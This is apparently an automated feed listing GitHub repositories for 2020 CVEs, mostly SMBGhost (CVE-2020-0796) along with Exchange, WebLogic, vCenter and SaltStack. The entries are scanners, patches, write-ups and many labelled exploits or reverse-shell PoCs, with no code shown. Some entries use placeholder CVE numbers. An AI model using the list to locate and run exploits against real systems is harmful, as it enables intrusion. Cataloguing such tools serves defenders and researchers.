**Scanners List - Microsoft Windows SMBv3 Remote Code Execution Vulnerability (CVE-2020-0796) ** : [Dhoomralochana/Scanners-for-CVE-2020-0796-Testing](https://api.github.com/repos/Dhoomralochana/Scanners-for-CVE-2020-0796-Testing) create time: 2020-03-12T16:39:41Z

**Check system is vulnerable CVE-2020-0796 (SMB v3)** : [UraSecTeam/smbee](https://api.github.com/repos/UraSecTeam/smbee) create time: 2020-03-12T17:32:56Z

**None** : [5l1v3r1/CVE-2020-0799](https://api.github.com/repos/5l1v3r1/CVE-2020-0799) create time: 2020-03-18T20:20:23Z

**Scanner script to identify hosts vulnerable to CVE-2020-0796** : [wneessen/SMBCompScan](https://api.github.com/repos/wneessen/SMBCompScan) create time: 2020-03-12T19:22:36Z

**SMBGhost (CVE-2020-0796) threaded scanner** : [netscylla/SMBGhost](https://api.github.com/repos/netscylla/SMBGhost) create time: 2020-03-12T18:03:45Z

**Multithreaded Scanner for CVE-2020-0796 - SMBv3 RCE** : [IAreKyleW00t/SMBGhosts](https://api.github.com/repos/IAreKyleW00t/SMBGhosts) create time: 2020-03-12T23:55:39Z

**SMBv3 RCE vulnerability in SMBv3** : [laolisafe/CVE-2020-0796](https://api.github.com/repos/laolisafe/CVE-2020-0796) create time: 2020-03-12T19:46:25Z

**Microsoft SMV3.1.1 wormable Exploit** : [TinToSer/cve2020-0796](https://api.github.com/repos/TinToSer/cve2020-0796) create time: 2020-03-13T06:58:59Z

**Scanner for CVE-2020-0796 - A SMBv3.1.1 + SMB compression RCE ** : [ioncodes/SMBGhost](https://api.github.com/repos/ioncodes/SMBGhost) create time: 2020-03-12T19:33:18Z

**CVE-2020-0796 - Working PoC - 20200313** : [vysecurity/CVE-2020-0796](https://api.github.com/repos/vysecurity/CVE-2020-0796) create time: 2020-03-13T08:34:31Z

**None** : [shadowsock5/ShardingSphere_CVE-2020-1947](https://api.github.com/repos/shadowsock5/ShardingSphere_CVE-2020-1947) create time: 2020-03-13T09:47:33Z

**This script will apply the workaround for the vulnerability CVE-2020-0796 for the SMBv3 unauthenticated RCE** : [Almorabea/SMBGhost-WorkaroundApplier](https://api.github.com/repos/Almorabea/SMBGhost-WorkaroundApplier) create time: 2020-03-12T20:41:30Z

**CVE-2020-0796 SMBGhost** : [marcinguy/CVE-2020-0796](https://api.github.com/repos/marcinguy/CVE-2020-0796) create time: 2020-03-13T12:18:13Z

**None** : [plorinquer/cve-2020-0796](https://api.github.com/repos/plorinquer/cve-2020-0796) create time: 2020-03-13T16:08:46Z

**Little scanner to know if a machine is runnig SMBv3 (possible vulnerability CVE-2020-0796)** : [BinaryShadow94/SMBv3.1.1-scan---CVE-2020-0796](https://api.github.com/repos/BinaryShadow94/SMBv3.1.1-scan---CVE-2020-0796) create time: 2020-03-13T19:27:30Z

**CVE-2020-0796 Python POC buffer overflow** : [wsfengfan/CVE-2020-0796](https://api.github.com/repos/wsfengfan/CVE-2020-0796) create time: 2020-03-14T05:39:37Z

**PoC for triggering buffer overflow via CVE-2020-0796** : [eerykitty/CVE-2020-0796-PoC](https://api.github.com/repos/eerykitty/CVE-2020-0796-PoC) create time: 2020-03-12T18:34:40Z

**CVE-2020-0796-Scanner** : [jiansiting/CVE-2020-0796-Scanner](https://api.github.com/repos/jiansiting/CVE-2020-0796-Scanner) create time: 2020-03-15T03:17:47Z

**CVE2020-0796 SMBv3 RCE** : [claroty/CVE2020-0796](https://api.github.com/repos/claroty/CVE2020-0796) create time: 2020-03-11T16:37:10Z

**An unauthenticated PoC for CVE-2020-0796** : [maxpl0it/Unauthenticated-CVE-2020-0796-PoC](https://api.github.com/repos/maxpl0it/Unauthenticated-CVE-2020-0796-PoC) create time: 2020-03-15T22:17:50Z

**Lightweight PoC and Scanner for CVE-2020-0796 without authentication.** : [5l1v3r1/CVE-2020-0796-PoC-and-Scan](https://api.github.com/repos/5l1v3r1/CVE-2020-0796-PoC-and-Scan) create time: 2020-03-18T20:21:25Z

**Scanner for CVE-2020-0796** : [julixsalas/CVE-2020-0796](https://api.github.com/repos/julixsalas/CVE-2020-0796) create time: 2020-03-16T15:39:22Z

**Exploiter la vulnérabilité CVE-2020-0796, Remote Code Execution du protocole SMB 3.1.1 (SMBv3).** : [bonesg/CVE-2020-0797](https://api.github.com/repos/bonesg/CVE-2020-0797) create time: 2020-03-17T14:16:54Z

**基于asyncio(协程)的CVE-2020-0796 速度还是十分可观的,方便运维师傅们对内网做下快速检测。** : [GuoKerS/aioScan_CVE-2020-0796](https://api.github.com/repos/GuoKerS/aioScan_CVE-2020-0796) create time: 2020-03-14T23:39:25Z

**CVE-2020-0796.SMBGhost_Crash_Poc ** : [5l1v3r1/SMBGhost_Crash_Poc](https://api.github.com/repos/5l1v3r1/SMBGhost_Crash_Poc) create time: 2020-03-18T20:21:01Z

**None** : [kernelkill/cve2020-0796](https://api.github.com/repos/kernelkill/cve2020-0796) create time: 2020-03-18T13:28:49Z

**CVE-2020-0796_CoronaBlue_SMBGhost** : [sujitawake/smbghost](https://api.github.com/repos/sujitawake/smbghost) create time: 2020-03-16T15:31:52Z

**Vulnerability scanner for CVE-2020-0688** : [cert-lv/CVE-2020-0688](https://api.github.com/repos/cert-lv/CVE-2020-0688) create time: 2020-03-19T16:39:56Z

**批量检测幽灵猫漏洞** : [Just1ceP4rtn3r/CVE-2020-1938-Tool](https://api.github.com/repos/Just1ceP4rtn3r/CVE-2020-1938-Tool) create time: 2020-03-20T09:29:18Z

**This repository details CVE-2020-6650, a vulnerability I discovered within Eaton's UPS Companion. All users should upgrade to v1.06 immediately or else they risk remote administrator access to their system.** : [RavSS/Eaton-UPS-Companion-Exploit](https://api.github.com/repos/RavSS/Eaton-UPS-Companion-Exploit) create time: 2019-10-25T23:06:20Z

**Exploit and detect tools for CVE-2020-0688** : [zcgonvh/CVE-2020-0688](https://api.github.com/repos/zcgonvh/CVE-2020-0688) create time: 2020-03-01T12:57:32Z

**Labelgrup Fixer for CVE-2020-5250 vulnerability** : [drkbcn/lblfixer_cve2020_5250](https://api.github.com/repos/drkbcn/lblfixer_cve2020_5250) create time: 2020-03-11T19:04:14Z

**A PoC for CVE-2020-0601** : [kudelskisecurity/chainoffools](https://api.github.com/repos/kudelskisecurity/chainoffools) create time: 2020-01-15T23:15:32Z

**Patch CVE-2020-5267 for Rails 4 and Rails 3** : [GUI/legacy-rails-CVE-2020-5267-patch](https://api.github.com/repos/GUI/legacy-rails-CVE-2020-5267-patch) create time: 2020-03-23T16:16:39Z

**DoS PoC for CVE-2020-0796 (SMBGhost)** : [cory-zajicek/CVE-2020-0796-DoS](https://api.github.com/repos/cory-zajicek/CVE-2020-0796-DoS) create time: 2020-03-21T18:17:10Z

**None** : [quarkslab/CVE-2020-0069_poc](https://api.github.com/repos/quarkslab/CVE-2020-0069_poc) create time: 2020-03-24T13:10:39Z

**CVE-2020-10673** : [0nise/CVE-2020-10673](https://api.github.com/repos/0nise/CVE-2020-10673) create time: 2020-03-23T09:10:54Z

**None** : [c0d3G33k/Safari-Video-Permission-Spoof-CVE-2020-9781](https://api.github.com/repos/c0d3G33k/Safari-Video-Permission-Spoof-CVE-2020-9781) create time: 2020-03-21T21:26:50Z

**AppleJPEGDriverUserClient : mach port use-after-free/type-confusion via race condition** : [XorgX304/CVE-2020-9768](https://api.github.com/repos/XorgX304/CVE-2020-9768) create time: 2020-09-25T13:12:04Z

**CVE-2020-10560 OSSN Arbitrary File Read** : [kevthehermit/CVE-2020-10560](https://api.github.com/repos/kevthehermit/CVE-2020-10560) create time: 2020-03-28T22:09:39Z

**None** : [LucidUnicorn/CVE-2020-10560-Key-Recovery](https://api.github.com/repos/LucidUnicorn/CVE-2020-10560-Key-Recovery) create time: 2020-03-10T12:55:06Z

**TP-Link Archer C50 V3 devices before Build 200318 Rel. 62209 allows remote attackers to cause a denial of service via a crafted HTTP Header containing an unexpected Referer field.** : [thewhiteh4t/cve-2020-9375](https://api.github.com/repos/thewhiteh4t/cve-2020-9375) create time: 2020-03-25T18:18:15Z

**CVE-2020-8515-PoC** : [imjdl/CVE-2020-8515-PoC](https://api.github.com/repos/imjdl/CVE-2020-8515-PoC) create time: 2020-03-30T03:31:26Z

**None** : [tripledd/cve-2020-0796-vuln](https://api.github.com/repos/tripledd/cve-2020-0796-vuln) create time: 2020-03-30T05:13:16Z

**SMBGHOST local privilege escalation** : [TinToSer/CVE-2020-0796-LPE](https://api.github.com/repos/TinToSer/CVE-2020-0796-LPE) create time: 2020-03-31T05:41:30Z

**CVE-2020-1938 / CNVD-2020-1048 Detection Tools** : [doggycheng/CNVD-2020-10487](https://api.github.com/repos/doggycheng/CNVD-2020-10487) create time: 2020-03-27T08:33:28Z

**Windows SMBv3 LPE exploit 已编译版** : [f1tz/CVE-2020-0796-LPE-EXP](https://api.github.com/repos/f1tz/CVE-2020-0796-LPE-EXP) create time: 2020-03-31T11:25:50Z

**Coronablue exploit** : [tango-j/CVE-2020-0796](https://api.github.com/repos/tango-j/CVE-2020-0796) create time: 2020-03-31T19:01:52Z

**None** : [jiansiting/CVE-2020-0796](https://api.github.com/repos/jiansiting/CVE-2020-0796) create time: 2020-04-01T01:46:08Z

**Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"** : [ravinacademy/CVE-2020-0688](https://api.github.com/repos/ravinacademy/CVE-2020-0688) create time: 2020-03-31T15:29:52Z

**https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3766** : [hessandrew/CVE-2020-3766_APSB20-12](https://api.github.com/repos/hessandrew/CVE-2020-3766_APSB20-12) create time: 2020-04-01T10:55:31Z

**Weaponized PoC for SMBv3 TCP codec/compression vulnerability** : [Aekras1a/CVE-2020-0796-PoC](https://api.github.com/repos/Aekras1a/CVE-2020-0796-PoC) create time: 2020-03-10T21:40:57Z

**CVE-2020-????** : [b1ack0wl/Edge0day.exe](https://api.github.com/repos/b1ack0wl/Edge0day.exe) create time: 2020-04-01T21:22:04Z

**CVE-2020-0796 Local Privilege Escalation POC** : [ZecOps/CVE-2020-0796-LPE-POC](https://api.github.com/repos/ZecOps/CVE-2020-0796-LPE-POC) create time: 2020-03-30T16:06:50Z

**CVE-2020-0796-EXP** : [LabDookhtegan/CVE-2020-0796-EXP](https://api.github.com/repos/LabDookhtegan/CVE-2020-0796-EXP) create time: 2020-04-02T15:32:10Z

**None** : [asc0t6e/CVE-2020-TEST-BOT](https://api.github.com/repos/asc0t6e/CVE-2020-TEST-BOT) create time: 2020-04-03T02:56:53Z

**This is a writeup for CVE-2020-11107 reported by Maximilian Barz** : [S1lkys/CVE-2020-11107](https://api.github.com/repos/S1lkys/CVE-2020-11107) create time: 2020-04-03T13:46:25Z

**Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS)** : [thelostworldFree/CVE-2020-7961-payloads](https://api.github.com/repos/thelostworldFree/CVE-2020-7961-payloads) create time: 2020-05-23T17:01:57Z

**XAMPP - CVE-2020-11107** : [andripwn/CVE-2020-11107](https://api.github.com/repos/andripwn/CVE-2020-11107) create time: 2020-04-05T10:45:49Z

**CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability" ** : [mahyarx/Exploit_CVE-2020-0688](https://api.github.com/repos/mahyarx/Exploit_CVE-2020-0688) create time: 2020-04-05T13:26:03Z

**Use shell to build weblogic debug environment for CVE-2020-2551** : [cnsimo/CVE-2020-2551](https://api.github.com/repos/cnsimo/CVE-2020-2551) create time: 2020-04-06T10:47:35Z

**Lightweight PoC and Scanner for CVE-2020-0796 without authentication.** : [ran-sama/CVE-2020-0796](https://api.github.com/repos/ran-sama/CVE-2020-0796) create time: 2020-03-16T00:47:41Z

**Weblogic IIOP CVE-2020-2551** : [Y4er/CVE-2020-2551](https://api.github.com/repos/Y4er/CVE-2020-2551) create time: 2020-02-28T08:46:21Z

**CVE-2020-10199 CVE-2020-10204 Python POC** : [wsfengfan/CVE-2020-10199-10204](https://api.github.com/repos/wsfengfan/CVE-2020-10199-10204) create time: 2020-04-07T13:23:12Z

**Exploits for Android Binder bug CVE-2020-0041** : [bluefrostsecurity/CVE-2020-0041](https://api.github.com/repos/bluefrostsecurity/CVE-2020-0041) create time: 2020-03-31T17:53:57Z

**CVE-2020-10199、CVE-2020-10204、CVE-2020-11444** : [jas502n/CVE-2020-10199](https://api.github.com/repos/jas502n/CVE-2020-10199) create time: 2020-04-08T07:36:30Z

**CVE-2020-10239: Incorrect Access Control in com_fields SQL field-RCE- PoC** : [HoangKien1020/CVE-2020-10239](https://api.github.com/repos/HoangKien1020/CVE-2020-10239) create time: 2020-03-21T08:40:40Z

**CVE-2020-1958 PoC** : [ggolawski/CVE-2020-1958](https://api.github.com/repos/ggolawski/CVE-2020-1958) create time: 2020-04-11T13:31:02Z

**CVE-2020-10199、CVE-2020-10204漏洞一键检测工具,图形化界面。CVE-2020-10199 and CVE-2020-10204 Vul Tool with GUI.** : [magicming200/CVE-2020-10199_CVE-2020-10204](https://api.github.com/repos/magicming200/CVE-2020-10199_CVE-2020-10204) create time: 2020-04-08T11:08:35Z

**None** : [weinull/CVE-2020-11650](https://api.github.com/repos/weinull/CVE-2020-11650) create time: 2020-04-09T06:21:35Z

**This tool helps scan large subnets for cve-2020-0796 vulnerable systems** : [intelliroot-tech/cve-2020-0796-Scanner](https://api.github.com/repos/intelliroot-tech/cve-2020-0796-Scanner) create time: 2020-04-14T10:01:05Z

**Powershell SMBv3 Compression checker** : [T13nn3s/CVE-2020-0796](https://api.github.com/repos/T13nn3s/CVE-2020-0796) create time: 2020-03-11T09:13:48Z

**None** : [mzer0one/CVE-2020-7961-POC](https://api.github.com/repos/mzer0one/CVE-2020-7961-POC) create time: 2020-03-26T01:34:38Z

**https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00344.html** : [hessandrew/CVE-2020-0568_INTEL-SA-00344](https://api.github.com/repos/hessandrew/CVE-2020-0568_INTEL-SA-00344) create time: 2020-04-14T22:50:36Z

**https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00338.html** : [hessandrew/CVE-2020-0557_INTEL-SA-00338](https://api.github.com/repos/hessandrew/CVE-2020-0557_INTEL-SA-00338) create time: 2020-04-14T22:51:34Z

**Working Exploit PoC for VMWare vCenter Server (CVE-2020-3952) - Reverse Bind Shell** : [avboy1337/CVE-2020-3952](https://api.github.com/repos/avboy1337/CVE-2020-3952) create time: 2020-04-16T01:39:33Z

**None** : [mekoko/CVE-2020-4276](https://api.github.com/repos/mekoko/CVE-2020-4276) create time: 2020-04-15T01:26:55Z

**https://bugs.chromium.org/p/project-zero/issues/detail?id=2021** : [Asgavar/CVE-2020-5260](https://api.github.com/repos/Asgavar/CVE-2020-5260) create time: 2020-04-15T11:32:16Z

**Writeup and POC for CVE-2020-0753, CVE-2020-0754 and six fixed Window DOS Vulnerabilities.** : [afang5472/CVE-2020-0753-and-CVE-2020-0754](https://api.github.com/repos/afang5472/CVE-2020-0753-and-CVE-2020-0754) create time: 2020-02-22T13:53:22Z

**Vuln Check** : [commandermoon/CVE-2020-3952](https://api.github.com/repos/commandermoon/CVE-2020-3952) create time: 2020-04-15T00:51:21Z

**Exploit for CVE-2020-3952 in vCenter 6.7** : [guardicore/vmware_vcenter_cve_2020_3952](https://api.github.com/repos/guardicore/vmware_vcenter_cve_2020_3952) create time: 2020-04-16T07:40:51Z

**A HTTP PoC Endpoint for cve-2020-5260 which can be deployed to Heroku** : [brompwnie/cve-2020-5260](https://api.github.com/repos/brompwnie/cve-2020-5260) create time: 2020-04-15T10:16:56Z

**CVE-2020-2555 Python POC** : [wsfengfan/CVE-2020-2555](https://api.github.com/repos/wsfengfan/CVE-2020-2555) create time: 2020-03-06T16:02:59Z

**CVE-2020-5260演示记录** : [sv3nbeast/CVE-2020-5260](https://api.github.com/repos/sv3nbeast/CVE-2020-5260) create time: 2020-04-16T16:19:23Z

**None** : [5l1v3r1/CVE-2020-10205](https://api.github.com/repos/5l1v3r1/CVE-2020-10205) create time: 2020-10-01T08:49:47Z

**VMWare vmdir missing access control exploit checker** : [gelim/CVE-2020-3952](https://api.github.com/repos/gelim/CVE-2020-3952) create time: 2020-04-17T12:39:31Z

**CVE-2020-2555** : [0nise/CVE-2020-2555](https://api.github.com/repos/0nise/CVE-2020-2555) create time: 2020-03-07T12:02:26Z

**None** : [Fa1c0n35/https-github.com-guardicore-vmware_vcenter_cve_2020_3952](https://api.github.com/repos/Fa1c0n35/https-github.com-guardicore-vmware_vcenter_cve_2020_3952) create time: 2020-04-19T18:32:28Z

**Exploit for CVE-2020-3952 in vCenter 6.7 https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/** : [Fa1c0n35/vmware_vcenter_cve_2020_3952](https://api.github.com/repos/Fa1c0n35/vmware_vcenter_cve_2020_3952) create time: 2020-04-19T18:35:13Z

**PoC RCE Reverse Shell for CVE-2020-0883** : [thelostworldFree/CVE-2020-0883](https://api.github.com/repos/thelostworldFree/CVE-2020-0883) create time: 2020-04-22T09:08:33Z

**PoC RCE Reverse Shell for CVE-2020-0688** : [ktpdpro/CVE-2020-0688](https://api.github.com/repos/ktpdpro/CVE-2020-0688) create time: 2020-04-22T07:28:32Z

**Exploit PoC RCE - Windows Hyper-V Remote Code Execution Reverse Shell** : [inetshell/CVE-2020-0910](https://api.github.com/repos/inetshell/CVE-2020-0910) create time: 2020-04-22T02:07:41Z

**Improper Access Control in Tata Sonata Smartband** : [the-girl-who-lived/CVE-2020-11539](https://api.github.com/repos/the-girl-who-lived/CVE-2020-11539) create time: 2020-02-05T12:19:19Z

**win32k use-after-free poc** : [james0x40/CVE-2020-0624](https://api.github.com/repos/james0x40/CVE-2020-0624) create time: 2020-04-22T13:11:16Z

**None** : [section-c/CVE-2020-2333](https://api.github.com/repos/section-c/CVE-2020-2333) create time: 2020-04-22T13:44:30Z

**None** : [syadg123/CVE-2020-0796](https://api.github.com/repos/syadg123/CVE-2020-0796) create time: 2020-04-22T09:10:15Z

**None** : [syadg123/CVE-2020-0883](https://api.github.com/repos/syadg123/CVE-2020-0883) create time: 2020-04-22T09:10:27Z

**None** : [section-c/CVE-2020-0796](https://api.github.com/repos/section-c/CVE-2020-0796) create time: 2020-04-22T15:33:49Z

**None** : [section-c/CVE-2020-6888](https://api.github.com/repos/section-c/CVE-2020-6888) create time: 2020-04-22T15:38:18Z

**Docker repository with a PoC for WP Code Snippets 2.13.3 (CVE-2020-8417)** : [vulncrate/wp-codesnippets-cve-2020-8417](https://api.github.com/repos/vulncrate/wp-codesnippets-cve-2020-8417) create time: 2020-02-06T00:03:14Z

**CVE-2020-8950 AMD User Experience Program Launcher from Radeon Software Privilege Escalation ( FileWrite eop) ** : [sailay1996/amd_eop_poc](https://api.github.com/repos/sailay1996/amd_eop_poc) create time: 2020-02-07T18:22:51Z

**BigBlueButton versions lower than 2.2.4 have a LFI vulnerability allowing access to sensitive files. 🚨** : [tchenu/CVE-2020-12112](https://api.github.com/repos/tchenu/CVE-2020-12112) create time: 2020-04-23T18:50:23Z

**None** : [zhang192073/cve-2020-test](https://api.github.com/repos/zhang192073/cve-2020-test) create time: 2020-04-26T09:42:49Z

**None** : [asc0t6e/Cve-20201-1234](https://api.github.com/repos/asc0t6e/Cve-20201-1234) create time: 2020-04-26T14:24:00Z

**None** : [asc0t6e/cVe-2020-12345](https://api.github.com/repos/asc0t6e/cVe-2020-12345) create time: 2020-04-26T14:25:40Z

**None** : [waleweewe12/CVE-2020-8417](https://api.github.com/repos/waleweewe12/CVE-2020-8417) create time: 2020-04-27T00:41:39Z

**None** : [wcxxxxx/CVE-2020-7961](https://api.github.com/repos/wcxxxxx/CVE-2020-7961) create time: 2020-04-27T04:27:51Z

**PoC repository for CVE-2020-6861: Ledger Monero App Spend key Extraction** : [ph4r05/ledger-app-monero-1.42-vuln](https://api.github.com/repos/ph4r05/ledger-app-monero-1.42-vuln) create time: 2020-01-03T18:24:29Z

**The official exploit for Open-AudIT v3.3.1 Remote Code Execution CVE-2020-12078** : [mhaskar/CVE-2020-12078](https://api.github.com/repos/mhaskar/CVE-2020-12078) create time: 2020-04-28T13:48:27Z

**None** : [tdcoming/CVE-2020-9999](https://api.github.com/repos/tdcoming/CVE-2020-9999) create time: 2020-04-30T07:40:15Z

**None** : [tdcoming/CVE-2020-98989](https://api.github.com/repos/tdcoming/CVE-2020-98989) create time: 2020-04-30T08:03:38Z

**None** : [tdcoming/CVE-2020-99999999](https://api.github.com/repos/tdcoming/CVE-2020-99999999) create time: 2020-04-30T10:29:08Z

**None** : [tdcoming/CVE-2020-88888](https://api.github.com/repos/tdcoming/CVE-2020-88888) create time: 2020-04-30T15:12:03Z

**Checks for CVE-2020-11651 and CVE-2020-11652** : [chef-cft/salt-vulnerabilities](https://api.github.com/repos/chef-cft/salt-vulnerabilities) create time: 2020-05-01T03:23:01Z

**None** : [dozernz/cve-2020-11651](https://api.github.com/repos/dozernz/cve-2020-11651) create time: 2020-05-04T08:01:37Z

**CVE-2020-11651&&CVE-2020-11652 EXP** : [Imanfeng/SaltStack-Exp](https://api.github.com/repos/Imanfeng/SaltStack-Exp) create time: 2020-05-04T14:21:58Z

**CVE-2020-11651&&CVE-2020-11652 EXP** : [bravery9/SaltStack-Exp](https://api.github.com/repos/bravery9/SaltStack-Exp) create time: 2020-05-04T15:07:11Z

**osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting** : [mkelepce/CVE-2020-12629](https://api.github.com/repos/mkelepce/CVE-2020-12629) create time: 2020-05-04T14:37:51Z

**POC code for CVE-2020-3153 - Cisco anyconnect path traversal vulnerability** : [shubham0d/CVE-2020-3153](https://api.github.com/repos/shubham0d/CVE-2020-3153) create time: 2020-05-04T18:36:22Z

**PoC for CVE-2020-11651** : [RakhithJK/CVE-2020-11651](https://api.github.com/repos/RakhithJK/CVE-2020-11651) create time: 2020-05-09T11:22:25Z

**PoC for CVE-2020-11651** : [kevthehermit/CVE-2020-11651](https://api.github.com/repos/kevthehermit/CVE-2020-11651) create time: 2020-05-04T20:34:04Z

**CVE-2020-11651: Proof of Concept** : [0xc0d/CVE-2020-11651](https://api.github.com/repos/0xc0d/CVE-2020-11651) create time: 2020-05-04T11:47:56Z

**patches for SNYK-JS-JQUERY-565129, SNYK-JS-JQUERY-567880, CVE-2020-1102, CVE-2020-11023, includes the patches for SNYK-JS-JQUERY-174006, CVE-2019-11358, CVE-2019-5428** : [DanielRuf/snyk-js-jquery-565129](https://api.github.com/repos/DanielRuf/snyk-js-jquery-565129) create time: 2020-04-14T19:12:01Z

**Citrix Sharefile vulnerability check and fast research details** : [DimitriNL/CTX-CVE-2020-7473](https://api.github.com/repos/DimitriNL/CTX-CVE-2020-7473) create time: 2020-04-17T18:48:38Z

**Proof of concept code to exploit CVE-2020-12116: Unauthenticated arbitrary file read on ManageEngine OpManger.** : [BeetleChunks/CVE-2020-12116](https://api.github.com/repos/BeetleChunks/CVE-2020-12116) create time: 2020-05-08T15:56:26Z

**None** : [lovelyjuice/cve-2020-11651-exp-plus](https://api.github.com/repos/lovelyjuice/cve-2020-11651-exp-plus) create time: 2020-05-07T04:41:25Z

**Proof of concept exploit about OpenSSL signature_algorithms_cert DoS flaw (CVE-2020-1967)** : [irsl/CVE-2020-1967](https://api.github.com/repos/irsl/CVE-2020-1967) create time: 2020-04-28T21:15:35Z

**利用微信推送CVE-2020** : [weixiao9188/wechat_push](https://api.github.com/repos/weixiao9188/wechat_push) create time: 2020-05-08T09:09:56Z

**Weblogic coherence.jar RCE** : [Y4er/CVE-2020-2883](https://api.github.com/repos/Y4er/CVE-2020-2883) create time: 2020-05-10T09:04:43Z

**Double-Free BUG in WhatsApp exploit poc.** : [ProjectorBUg/CVE-2020-11932](https://api.github.com/repos/ProjectorBUg/CVE-2020-11932) create time: 2020-05-10T15:25:59Z

**A Python script to exploit CVE-2020-8816, a remote code execution vulnerability on the Pi-hole** : [AndreyRainchik/CVE-2020-8816](https://api.github.com/repos/AndreyRainchik/CVE-2020-8816) create time: 2020-05-10T01:12:28Z

**PoCs for CVE-2020-11108; an RCE and priv esc in Pi-hole** : [Frichetten/CVE-2020-11108-PoC](https://api.github.com/repos/Frichetten/CVE-2020-11108-PoC) create time: 2020-04-04T00:50:42Z

**SMBGhost CVE-2020-0796** : [bacth0san96/SMBGhostScanner](https://api.github.com/repos/bacth0san96/SMBGhostScanner) create time: 2020-05-12T14:41:27Z

**None** : [Dilan-Diaz/Point-to-Point-Protocol-Daemon-RCE-Vulnerability-CVE-2020-8597-](https://api.github.com/repos/Dilan-Diaz/Point-to-Point-Protocol-Daemon-RCE-Vulnerability-CVE-2020-8597-) create time: 2020-05-12T15:55:08Z

**None** : [Prabhashaka/IT19147192-CVE-2020-8835](https://api.github.com/repos/Prabhashaka/IT19147192-CVE-2020-8835) create time: 2020-05-12T16:18:31Z

**This is about CVE-2020-1938** : [I-Runtime-Error/CVE-2020-1938](https://api.github.com/repos/I-Runtime-Error/CVE-2020-1938) create time: 2020-05-12T15:54:28Z

**Report for Exploit Assignment. Topic Selected: CVE 2020-7274** : [Caj6r/SNP_report_assignement_IT19009278](https://api.github.com/repos/Caj6r/SNP_report_assignement_IT19009278) create time: 2020-05-12T17:52:00Z

**CVE-2020-1938 exploit** : [Umesh2807/Ghostcat](https://api.github.com/repos/Umesh2807/Ghostcat) create time: 2020-05-12T18:03:59Z

**CVE-2020-5837 exploit** : [RedyOpsResearchLabs/SEP-14.2-Arbitrary-Write](https://api.github.com/repos/RedyOpsResearchLabs/SEP-14.2-Arbitrary-Write) create time: 2020-04-16T08:15:18Z

**Proof of concept for Weblogic CVE-2020-2883** : [MagicZer0/Weblogic_CVE-2020-2883_POC](https://api.github.com/repos/MagicZer0/Weblogic_CVE-2020-2883_POC) create time: 2020-05-13T09:56:48Z

**None** : [wuxx/CVE-2020-8004](https://api.github.com/repos/wuxx/CVE-2020-8004) create time: 2020-05-14T03:52:58Z

**CVE-2020-10199 回显版本** : [aleenzz/CVE-2020-10199](https://api.github.com/repos/aleenzz/CVE-2020-10199) create time: 2020-05-15T06:12:51Z

**Exploit for "GitLab Instance" Arbitrary server file read vulnerability** : [KooroshRZ/CVE-2020-10977](https://api.github.com/repos/KooroshRZ/CVE-2020-10977) create time: 2020-05-02T10:03:31Z

**This is an exploit for CVE-2020-0674 that runs on the x64 version of IE 8, 9, 10, and 11 on Windows 7.** : [maxpl0it/CVE-2020-0674-Exploit](https://api.github.com/repos/maxpl0it/CVE-2020-0674-Exploit) create time: 2020-05-07T22:02:25Z

**PoC for CVE-2009-0229 "Print Spooler Read File Vulnerability" LPE AFR (related to CVE-2020-1048)** : [zveriu/CVE-2009-0229-PoC](https://api.github.com/repos/zveriu/CVE-2009-0229-PoC) create time: 2020-05-14T19:40:50Z

**PoC for CVE-2020-3153 Cisco AnyConnect Secure Mobility Client EoP** : [raspberry-pie/CVE-2020-3153](https://api.github.com/repos/raspberry-pie/CVE-2020-3153) create time: 2020-05-15T11:40:02Z

**PoC for CVE-2020-1015** : [0xeb-bp/cve-2020-1015](https://api.github.com/repos/0xeb-bp/cve-2020-1015) create time: 2020-05-13T16:42:17Z

**Check CVE-2020-11932 (ubuntu server) and test host relating to this vulnerability ** : [Staubgeborener/CVE-2020-11932](https://api.github.com/repos/Staubgeborener/CVE-2020-11932) create time: 2020-05-14T11:47:52Z

**BlueFrag experiments** : [marcinguy/CVE-2020-0022](https://api.github.com/repos/marcinguy/CVE-2020-0022) create time: 2020-02-12T22:00:35Z

**Weblogic Vuln POC EXP cve-2020-2551 cve-2020-2555 cve-2020-2883 ,。。。** : [zzwlpx/weblogicPoc](https://api.github.com/repos/zzwlpx/weblogicPoc) create time: 2020-05-16T03:01:32Z

**HP LinuxKI <= v6.0-1 "kivis.php" Remote Command Injection** : [cwinfosec/CVE-2020-7209](https://api.github.com/repos/cwinfosec/CVE-2020-7209) create time: 2020-05-18T03:34:40Z

**Salt security backports for CVE-2020-11651 & CVE-2020-11652** : [rossengeorgiev/salt-security-backports](https://api.github.com/repos/rossengeorgiev/salt-security-backports) create time: 2020-05-01T20:53:49Z

**tomcat使用了自带session同步功能时,不安全的配置(没有使用EncryptInterceptor)导致存在的反序列化漏洞,通过精心构造的数据包, 可以对使用了tomcat自带session同步功能的服务器进行攻击。PS:这个不是CVE-2020-9484,9484是session持久化的洞,这个是session集群同步的洞!** : [threedr3am/tomcat-cluster-session-sync-exp](https://api.github.com/repos/threedr3am/tomcat-cluster-session-sync-exp) create time: 2020-05-19T05:12:53Z

**这资源是作者复现微软签字证书漏洞CVE-2020-0601,结合相关资源及文章实现。推荐大家结合作者博客,复现了该漏洞和理解恶意软件自启动劫持原理。作为网络安全初学者,自己确实很菜,但希望坚持下去,一起加油!** : [eastmountyxz/CVE-2018-20250-WinRAR](https://api.github.com/repos/eastmountyxz/CVE-2018-20250-WinRAR) create time: 2020-02-17T15:08:22Z

**PoC for CVE-2020-8617 (BIND)** : [knqyf263/CVE-2020-8617](https://api.github.com/repos/knqyf263/CVE-2020-8617) create time: 2020-05-20T12:26:45Z

**None** : [masahiro331/CVE-2020-9484](https://api.github.com/repos/masahiro331/CVE-2020-9484) create time: 2020-05-21T00:41:06Z

**Puma, CVE-2020-11076 and CVE-2020-11077** : [dentarg/cougar](https://api.github.com/repos/dentarg/cougar) create time: 2020-05-21T10:55:22Z

**用Kali 2.0复现Apache Tomcat Session反序列化代码执行漏洞** : [IdealDreamLast/CVE-2020-9484](https://api.github.com/repos/IdealDreamLast/CVE-2020-9484) create time: 2020-05-21T14:30:46Z

